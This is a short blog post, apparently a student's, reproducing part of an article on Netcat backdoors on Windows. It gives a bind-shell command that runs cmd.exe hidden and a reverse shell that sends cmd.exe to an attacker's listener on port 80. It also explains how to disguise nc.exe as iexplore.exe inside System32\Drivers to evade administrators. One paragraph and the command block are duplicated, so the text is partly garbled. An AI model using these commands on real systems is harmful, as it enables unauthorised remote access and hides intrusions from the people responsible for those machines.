I had this piece of information which I came across when professor was taking NetCat class. I don’t have the whole article. Here is a piece that explains how a hacker can run the backdoor and also hide it from a not so smart network or system admin. It is technical. If you are interested in these type of information, read on.
Netcat Backdoor Victim: nc -L -d -p <port> -t -e cmd.exe
-L is the listening command. -d tells netcat not to open a window when running. -p assigns a port. -t is for telnet. -e activates cmd.exe when client connects to it
Client: nc -v <ip address of victim>
note: In this example netcat runs in the background on the victims machine. A system admin may open task manager and see that nc.exe is running. A smart hacker would change nc.exe to something like iexplorer.exe or updatemanager.exe in order to avoid suspiscion. Now, if a system administrator runs a trusted netstat –a –n command at the DOS prompt, he or she might notice that something is running on a rather odd port, telnet to that port, and discover the trick. However, Windows uses several random ports for varying reasons and netstat output can be time consuming to parse, especially on systems
with a lot of activity. Hackers might try a different approach. If they’ve infiltrated a Citrix server, for example, accessed by several users who are surfing the Web, you’d expect to see a lot of Domain Name System (DNS) lookups and Web connections. Running netstat –a –n would reveal a load of outgoing TCP port 80 connections. Instead of having an instance of Netcat listening on the Windows box and waiting for connections, Netcat can pipe the input and output of the cmd.exe program to another Netcat instance listening on a remote box on port 80. On his end, the hacker would run:
with a lot of activity. Hackers might try a different approach. If they’ve infiltrated a Citrix server, for example, accessed by several users who are surfing the Web, you’d expect to see a lot of Domain Name System (DNS) lookups and Web connections. Running netstat –a –n would reveal a load of outgoing TCP port 80 connections. Instead of having an instance of Netcat listening on the Windows box and waiting for connections, Netcat can pipe the input and output of the cmd.exe program to another Netcat instance listening on a remote box on port 80. On his end, the hacker would run:
nc –l –p 80
From the Windows box, the hacker could cleverly “hide” Netcat again and issue these commands:
mkdir C:\Windows\System32\Drivers\q
move nc.exe C:\Windows\System32\Drivers\q\iexplore.exe
cd Windows\System32\Drivers\q
WINDOWS\System32\DRIVERS\q>iexplore.exe
Cmd line: -d -e cmd.exe originix 80
WINDOWS\System32\DRIVERS\q>
move nc.exe C:\Windows\System32\Drivers\q\iexplore.exe
cd Windows\System32\Drivers\q
WINDOWS\System32\DRIVERS\q>iexplore.exe
Cmd line: -d -e cmd.exe originix 80
WINDOWS\System32\DRIVERS\q>
Now the listening Netcat should pick up the command shell from the Windows machine. This can do a better job of hiding a backdoor from a system administrator. At first glance, the connection will just look like Internet Explorer making a typical HTTP connection. Its only disadvantage for the hacker is that after terminating the shell, there’s no way of restarting it on the Windows side.
Leave a Reply
You must be logged in to post a comment.